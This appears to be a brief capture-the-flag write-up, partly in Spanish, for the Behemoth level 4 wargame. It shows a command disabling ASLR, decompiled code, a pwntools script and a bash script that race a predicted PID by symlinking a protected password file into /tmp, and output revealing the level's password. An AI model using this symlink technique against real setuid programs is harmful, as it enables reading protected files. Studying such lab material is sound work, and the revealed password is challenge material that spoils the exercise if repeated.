Behemoth4
Recordamos deshabilitar ASLR con:
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
__libc_start_main(0x804857b, 1, 0xffffd774, 0x8048640 <unfinished ...>
getpid() = 770
sprintf("/tmp/770", "/tmp/%d", 770) = 8
fopen("/tmp/770", "r") = 0
puts("PID not found!"PID not found!
) = 15
+++ exited (status 0) +++undefined4 main(void)
{
char local_30 [20];
int local_1c;
FILE *local_18;
__pid_t local_14;
undefined *local_c;
local_c = &stack0x00000004;
local_14 = getpid();
sprintf(local_30,"/tmp/%d",local_14);
local_18 = fopen(local_30,"r");
if (local_18 == (FILE *)0x0) {
puts("PID not found!");
}
else {
sleep(1);
puts("Finished sleeping, fgetcing");
while( true ) {
local_1c = fgetc(local_18);
if (local_1c == -1) break;
putchar(local_1c);
}
fclose(local_18);
}
return 0;
}from pwn import *
import os, sys
p = process('./behemoth4')
context.update(arch='amd64')
pid = p.pid
new_pid = pid + int(sys.argv[1])
print(new_pid - pid)
os.system('ln -s /etc/behemoth_pass/behemoth5 /tmp/' + str(new_pid))
p2 = process('./behemoth4')
print(p2.recvall())behemoth4@behemoth:/behemoth$ python /tmp/x4v1l0k.py 4
[+] Starting local process './behemoth4': pid 1255
1255
1259
[+] Starting local process './behemoth4': pid 1259
[+] Receiving all data: Done (39B)
[*] Process './behemoth4' stopped with exit code 0 (pid 1259)
Finished sleeping, fgetcing
aizeeshing
[*] Process './behemoth4' stopped with exit code 0 (pid 1255)#!/bin/bash
/behemoth/behemoth4 &
# Obtiene el PID del ultimo comando ejecutado
PID=$!
kill -STOP $PID
ln -s /etc/behemoth_pass/behemoth5 /tmp/$PID
kill -CONT $PID